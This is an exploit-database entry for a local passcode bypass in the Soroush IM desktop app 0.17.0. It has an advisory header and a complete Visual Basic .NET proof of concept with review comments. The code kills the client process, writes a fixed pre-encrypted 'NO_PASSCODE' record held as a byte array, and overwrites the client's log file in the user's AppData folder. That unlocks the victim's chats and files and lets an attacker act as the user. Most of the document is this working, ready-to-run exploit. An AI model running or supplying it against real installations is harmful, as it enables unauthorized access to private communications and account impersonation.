Soroush IM Desktop App 0.17.0 – Authentication Bypass

  • 作者: VortexNeoX64
    日期: 2018-08-09
  • 来源:https://www.exploit-db.com/exploits/45171/
  • # Exploit Title: Soroush IM Desktop App 0.17.0 - Authentication Bypass
    # Date: 2018-08-08 
    # Exploit Author: VortexNeoX64
    # Vendor Homepage: https://soroush-app.ir
    # Software Link: http://54.36.43.176/SoroushSetup0.17.0.exe
    # Version: 0.17.0 BETA
    # Tested on: Windows 10 1803 and windows server 2016 14393
     
    # Security Issue:
    # It seems that all databases are encrypted with a constant key, so the same plaintext produces the same
    # ciphertext on every PC. Pushing NO_PASSCODE data that was encrypted beforehand into the database
    # on any other PC is therefore accepted as valid and removes the passcode. In other words, the stored
    # passcode state appears to carry no per-user or per-installation binding. The database entries are first
    # written to a log file in the same folder as the database, and then the Soroush app pushes the log file
    # into the permanent database. An attacker can unlock the client app with database injection and bypass the
    # authentication process. This exploit leads to two important security risks:
    
    # 1. The attacker can access all the data (chats, images, files, etc.) and is then able to send and receive data on behalf of the original user.
    # 2. The attacker may then use the exploit to perform a DoS attack, which is done by setting a new passcode for the client without knowing the previous passcode.
    
    # PoC (.NET 4.0 Visual Basic)
    # The PoC does not support Windows XP; try changing "\users\" to "\Documents and Settings\"
    
    ' Proof-of-concept console program for the passcode bypass described in the header above.
    ' It replaces the Soroush client's on-disk .log file for the current Windows user with a
    ' fixed, pre-built record. No elevation is requested anywhere in this code; every path it
    ' touches is under the current user's profile or the current working directory.
    '
    ' Detection note: the on-host footprint visible here is a forced taskkill of soroush.exe,
    ' followed by a process other than the client deleting and re-creating the .log file in the
    ' client's Data directory.
    ' NOTE(review): the fix belongs in the client - passcode state should be protected with a key
    ' bound to the user's secret or the installation and integrity-checked, so that a record
    ' produced on another machine is rejected. The advisory only says the key "seems" constant.
    Module Module1
    
    ' Entry point: prints a banner, waits for a key press, stops the client, stages the fixed
    ' record as a file and swaps it in for the client's existing .log file.
    ' Any exception is printed and followed by a beep; the program always waits for a final key press.
    Sub Main()
    Console.WriteLine("*** [Souroush IM Local Passcode bypass via database injection] ***")
    Console.WriteLine("*** [Developed by [VortexNeoX64] 2018] ***")
    Console.WriteLine("** [Tested on Windows 10 1803 and windows server 2016 14393 , Soroush version = 0.17.0 BETA] **")
    Console.WriteLine("** [Affected systems: probebly Linux, MacOS and for sureWindows] **")
    Console.WriteLine("** [Vulnerability type: Local & Privilege Escalation [Passcode bypass] ]**")
    Console.WriteLine()
    Console.WriteLine("Press any Key to exploit...")
    Console.ReadKey()
    ' Fixed payload, written to disk verbatim. The tail of the array is ASCII for a JSON object
    ' of the form {"data":"<base64-looking text>","type":"primitive"}; per the header this is the
    ' NO_PASSCODE entry captured in already-encrypted form. Nothing in it is derived from the
    ' target machine, which is what the constant-key observation rests on.
    ' NOTE(review): the leading bytes look like record framing for the log format - not confirmed here.
    Dim _temp As Byte() = {237, 4, 235, 105, 158, 3, 1, 16, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0,
    1, 88, 97, 81, 122, 79, 114, 86, 89, 53, 79, 111, 73, 79, 77,
    90, 49, 52, 102, 83, 101, 122, 80, 113, 121, 122, 88, 49, 70,
    65, 108, 56, 52, 116, 112, 87, 75, 77, 117, 115, 122, 117, 109,
    72, 101, 116, 51, 43, 54, 122, 106, 55, 117, 108, 74, 66, 47, 99,
    107, 110, 87, 113, 107, 84, 111, 74, 66, 52, 118, 53, 74, 120, 75,
    47, 114, 122, 57, 122, 73, 53, 116, 43, 76, 122, 68, 116, 86, 81,
    61, 61, 182, 6, 123, 34, 100, 97, 116, 97, 34, 58, 34, 57, 105, 105,
    116, 76, 114, 118, 88, 76, 98, 99, 66, 67, 74, 52, 87, 102, 68, 55,
    106, 66, 82, 72, 109, 110, 113, 66, 57, 110, 82, 85, 90, 81, 54, 85,
    49, 113, 78, 120, 75, 55, 57, 98, 106, 85, 106, 109, 74, 102, 122,
    105, 67, 111, 65, 100, 114, 99, 98, 82, 119, 54, 43, 75, 68, 72, 47,
    108, 85, 82, 90, 77, 119, 73, 103, 70, 113, 57, 75, 57, 112, 115, 57,
    97, 49, 69, 47, 77, 104, 73, 51, 51, 114, 80, 83, 81, 113, 99, 117, 49,
    89, 87, 101, 49, 83, 75, 98, 103, 78, 84, 72, 113, 89, 82, 87, 71, 73,
    43, 88, 111, 85, 105, 69, 55, 72, 120, 121, 120, 57, 50, 90, 116, 116,
    43, 81, 75, 100, 103, 114, 67, 77, 120, 122, 65, 66, 66, 50, 117, 85,
    87, 68, 119, 67, 113, 68, 105, 53, 67, 111, 86, 69, 108, 77, 43, 113,
    90, 106, 118, 75, 100, 66, 99, 112, 120, 99, 47, 110, 80, 84, 67, 55,
    117, 111, 116, 86, 115, 89, 50, 89, 55, 88, 89, 49, 88, 52, 78, 69, 52,
    100, 105, 110, 71, 120, 67, 87, 118, 118, 73, 106, 107, 80, 51, 85, 114,
    75, 48, 51, 100, 67, 114, 71, 85, 75, 119, 98, 70, 48, 85, 101, 73, 50, 77,
    108, 97, 84, 67, 100, 49, 97, 77, 43, 119, 83, 80, 111, 99, 110, 105, 66,
    97, 67, 48, 52, 56, 82, 83, 110, 97, 120, 75, 56, 88, 55, 84, 89, 83, 111,
    65, 111, 115, 98, 117, 78, 80, 66, 110, 103, 72, 52, 110, 68, 97, 112, 74,
    84, 104, 108, 120, 104, 85, 78, 117, 70, 103, 57, 48, 98, 65, 87, 100, 83,
    111, 75, 105, 69, 65, 56, 69, 106, 105, 52, 120, 69, 111, 97, 49, 70, 109,
    73, 49, 69, 83, 110, 67, 66, 117, 114, 76, 111, 70, 75, 53, 73, 111, 81, 49,
    74, 115, 79, 105, 74, 108, 119, 51, 89, 116, 69, 70, 71, 121, 121, 102, 76,
    110, 85, 73, 121, 56, 49, 54, 85, 71, 80, 87, 69, 53, 79, 90, 53, 74, 72, 50,
    66, 117, 84, 47, 79, 90, 65, 77, 111, 57, 88, 115, 88, 68, 105, 77, 121, 108,
    111, 66, 105, 105, 75, 81, 49, 56, 117, 50, 85, 104, 78, 109, 97, 119, 79, 67,
    74, 78, 120, 53, 108, 51, 118, 48, 68, 104, 84, 51, 76, 75, 106, 69, 103, 55, 86,
    84, 115, 79, 80, 65, 121, 118, 54, 90, 90, 83, 118, 82, 51, 67, 118, 109, 66,
    86, 57, 108, 52, 114, 70, 120, 71, 50, 52, 108, 113, 66, 70, 70, 101, 115, 105,
    120, 88, 102, 74, 122, 108, 90, 69, 111, 68, 120, 80, 115, 70, 109, 116, 88, 67,
    65, 110, 65, 86, 106, 70, 74, 54, 49, 80, 67, 104, 104, 84, 120, 67, 116, 115, 82,
    73, 108, 78, 77, 109, 90, 122, 77, 90, 80, 73, 99, 80, 104, 115, 68, 83, 80, 80,
    72, 76, 98, 49, 56, 56, 67, 84, 80, 80, 47, 116, 85, 48, 72, 122, 116, 101, 83, 105,
    68, 47, 66, 97, 84, 107, 50, 104, 102, 121, 82, 66, 114, 72, 78, 75, 56, 118, 89, 101,
    122, 122, 82, 117, 85, 102, 43, 78, 111, 111, 79, 43, 90, 73, 51, 69, 71, 90, 52, 69, 57,
    48, 75, 101, 80, 82, 52, 48, 122, 76, 49, 118, 116, 68, 65, 78, 98, 80, 47, 109, 57,
    122, 53, 87, 83, 105, 113, 118, 110, 47, 111, 66, 69, 78, 51, 100, 67, 72, 106, 120, 80,
    81, 55, 119, 54, 78, 68, 120, 108, 86, 108, 83, 117, 119, 113, 120, 78, 87, 47, 86, 102,
    117, 65, 74, 77, 84, 84, 121, 103, 73, 80, 89, 87, 73, 117, 85, 111, 101, 54, 118, 106, 71,
    83, 69, 118, 101, 78, 80, 72, 121, 99, 99, 88, 122, 90, 76, 122, 71, 90, 102, 66, 85, 87, 81,
    101, 75, 74, 99, 86, 68, 80, 103, 109, 43, 88, 66, 80, 73, 56, 47, 101, 107, 111, 101, 71, 104,
    108, 97, 107, 70, 75, 85, 112, 112, 57, 75, 99, 102, 111, 111, 97, 75, 51, 56, 48, 121, 78, 115,
    87, 118, 52, 119, 88, 51, 65, 116, 51, 118, 111, 114, 74, 81, 101, 119, 117, 89, 97, 76, 78, 114,
    116, 52, 68, 121, 122, 90, 107, 52, 98, 117, 68, 110, 87, 119, 85, 48, 97, 122, 109, 104, 71, 111,
    69, 119, 88, 66, 78, 108, 81, 79, 89, 54, 49, 117, 66, 103, 78, 110, 78, 103, 82, 65, 61, 61,
    34, 44, 34, 116, 121, 112, 101, 34, 58, 34, 112, 114, 105, 109, 105, 116, 105, 118, 101, 34, 125}
    Try
    Console.WriteLine("Killing the app...")
    ' Force-terminates soroush.exe and its child processes (/f /t) with a hidden window; the
    ' third argument (True) makes Shell wait for taskkill to finish before continuing.
    ' Presumably this is so the client does not hold the .log file open - not shown here.
    Shell("Taskkill /im soroush.exe /f /t ", AppWinStyle.Hide, True)
    Console.WriteLine("Making malicious database...")
    Dim target As String = ""
    Dim targetname As String = ""
    Dim index As Integer = 0
    Dim _info As IO.FileInfo()
    ' Data directory of the current user: the drive letter is the first character of the System
    ' folder path, followed by \Users\<user>\AppData\Roaming\Soroush\Data\<fixed 40-hex-character name>.
    ' The folder name is hard-coded, so this code assumes it is identical on every installation - TODO confirm.
    Dim _Dirinfo As New IO.DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.System).Substring(0, 1) & ":\Users\" & Environment.UserName & "\AppData\Roaming\Soroush\Data\73b880c1b168541ab6e01acc2f7bf46f06379320\")
    ' Stage the fixed payload in the current working directory first.
    IO.File.WriteAllBytes(Environment.CurrentDirectory & "\log.log", _temp)
    Console.WriteLine("Getting orginal database name....")
    _info = _Dirinfo.GetFiles()
    ' Take the first file in the data directory whose extension is ".log" as the file to replace.
    ' index is assigned here but never read afterwards.
    For i = 0 To _info.Count - 1
    If _info(i).Extension = ".log" Then
    target = _info(i).FullName
    targetname = _info(i).Name
    index = i
    Exit For
    End If
    Next
    Console.WriteLine("Target file is : [" & target & "]")
    Console.WriteLine("Renaming malicious database to [" & targetname & "]")
    ' Give the staged file the same file name as the client's existing .log file.
    IO.File.Move(Environment.CurrentDirectory & "\log.log", Environment.CurrentDirectory & "\" & targetname)
    Console.WriteLine("injecting database [" & target & "]")
    ' Fixed 1.5 s pause before touching the client's file; the reason is not stated in the source.
    Threading.Thread.Sleep(1500)
    ' Replace step: the client's own .log file is deleted and the staged copy is put at the same path.
    ' Nothing is backed up, so the original file content is lost.
    IO.File.Delete(target)
    IO.File.Copy(Environment.CurrentDirectory & "\" & targetname, target)
    Console.WriteLine("Done!")
    Catch ex As Exception
    ' Any failure in the steps above (process kill, directory listing, file operations) ends up here:
    ' only the exception message is printed, followed by a beep.
    Console.WriteLine(ex.Message)
    Beep()
    Finally
    ' Keep the console window open until a key is pressed, on success and on failure alike.
    Console.ReadKey()
    End Try
    End Sub
    
    End Module